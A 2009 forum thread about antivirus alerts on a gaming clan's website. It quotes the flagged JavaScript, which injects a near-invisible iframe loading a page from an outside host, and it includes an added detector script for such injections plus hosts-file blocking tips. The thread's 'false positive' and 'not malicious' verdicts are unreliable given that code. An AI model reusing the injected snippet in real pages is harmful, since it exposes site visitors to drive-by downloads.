Kaspersky detected Trojan downloader on website.
Might be a false-positive, but when I clicked on the link to the clan page, Kaspersky alerted me of a trojan downloader.
9/15/2009 5:46:10 PM http://8889.ss.la/ avast! Web Scanner Detected: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:46:10 PM http://8889.ss.la/ avast! Web Scanner Denied: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:47:01 PM http://8889.ss.la/ avast! Web Scanner Detected: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:47:01 PM http://8889.ss.la/ avast! Web Scanner Denied: Trojan-Downloader.JS.Iframe.brr
2 have been denied, and 2 have been detected. Should I be worried, because I know someone else who got this as well with AVG anti-virus? :O
Simple virus scan should do the trick, right?
Comments
Nod32 picks up nothing, nor have I seen any open connections to that address. The code it points to doesn't even look malicious:
var s, siteUrl, tmpdomain;
var arydomain = new Array(".gov.cn", ".e1du.cn", ".dl108.com");
s = document.location + "";
siteUrl = s.substring(7, s.indexOf('/', 7));
tmpdomain = 0;
for (var i = 0; i < arydomain.length; i++) {
  if (siteUrl.indexOf(arydomain[i]) > -1) {
    tmpdomain = 1;
    break;
  }
}
if (tmpdomain == 0) {
  document.writeln("<iframe src=http://ha2.ss.la/1/google.htm?1 width=123 height=1></iframe>");
}
The IP of the site, however, resolved to China. -
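The snippet quoted above writes an iframe one pixel high into any page whose host is not on its three-entry list. As an added example (not part of the original thread; the function names and the 2-pixel threshold are assumptions), this is one way to flag script-injected, near-invisible iframes when reviewing a site's JavaScript:

```javascript
// Added example (not from the thread): flag document.write()/writeln() calls whose
// string argument injects an iframe that is too small to see or is styled invisible.
const HIDDEN_MAX_PX = 2; // assumed threshold for this illustration

// Read one attribute from a tag; accepts "quoted", 'quoted' and unquoted values.
function attr(tag, name) {
  const re = new RegExp("\\s" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function hostOf(src) {
  try { return new URL(src).hostname; } catch { return null; } // relative or malformed
}

// Limitation: only string-literal arguments are inspected; markup assembled by
// concatenation or decoding at run time needs a DOM-level check instead.
function findInjectedIframes(source) {
  const findings = [];
  const writeCall = /document\.write(?:ln)?\s*\(\s*(["'])((?:\\.|(?!\1).)*)\1/g;
  for (const call of source.matchAll(writeCall)) {
    const markup = call[2].replace(/\\(["'])/g, "$1"); // undo \" and \' escapes
    for (const [tag] of markup.matchAll(/<iframe\b[^>]*>/gi)) {
      const width = parseInt(attr(tag, "width"), 10);
      const height = parseInt(attr(tag, "height"), 10);
      const style = attr(tag, "style") || "";
      const tiny = [width, height].some((n) => !Number.isNaN(n) && n <= HIDDEN_MAX_PX);
      const styledAway = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(style);
      const src = attr(tag, "src");
      findings.push({ src, host: hostOf(src), width, height, hidden: tiny || styledAway });
    }
  }
  return findings;
}

// Sample input: the writeln() call quoted in the thread, and a constructed benign embed.
const THREAD_SNIPPET = `if(tmpdomain == 0){ document.writeln("<iframe src=http://ha2.ss.la/1/google.htm?1 width=123 height=1></iframe>"); }`;
const BENIGN_SNIPPET = `document.write("<iframe src='https://video.example/embed/1' width=560 height=315></iframe>");`;
console.log(findInjectedIframes(THREAD_SNIPPET), findInjectedIframes(BENIGN_SNIPPET));
```

A finding with `hidden: true` and a `host` different from the site serving the script is the combination worth a closer look.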
Do I smell phishing? -
Omg the Chinese are coming for me.
So pretty much, this is harmless?
However, will a scan be enough to double check or are there some more things I can do? bah.
EDIT: Kaspersky picked up another one of these Trojan downloaders when I refreshed forums.
I think making fun of 9esu and T3 ticked China off. O_O
EDIT 2: To Greycloak, when I try to visit http://8889.ss.la/, Kaspersky blocks the site because it says it is infected. OMG OMG OMG. -
It definitely looks like it's spyware of some site, not necessarily a trojan. If you want to block contact to the site, go to C:\windows\system32\drivers\etc and open the file called 'hosts'. You will have to tell Windows to open it with notepad. Once it opens, on a new line put:
127.0.0.1 8889.ss.la
What that will do is anytime your browser makes a request for that page, it redirects it to your own computer. This effectively keeps that site from ever loading. On Vista systems you may need to open notepad with admin privileges to edit the hosts file.
Again, I was able to browse directly to the site without Nod32 raising any flags. I also haven't noticed any unwanted net traffic. -
Hm, I just finished scanning with Kaspersky and it didn't detect anything.
Just to make sure, I recently changed my password.
Prior to getting the detection, I remember something was odd about the site. There was no clan and forum link, but instead they were grouped together under (if I remember correctly) "Media".
So they were like sub-links such as the Downloads where you get Game download, screenshots, etc.
When I refreshed, the website went back to normal. Any thoughts? -
Thanks for the info on this, guys.
It is a false positive, at least on anything coming from our end. I can't speak to a potential spyware/malware/infection on any person's particular computer.
Best bet is to keep track, scan the system and check back.
I'll check into our site to make sure that whatever may be causing this gets taken care of.
edit: also gonna move this to the tech forums. -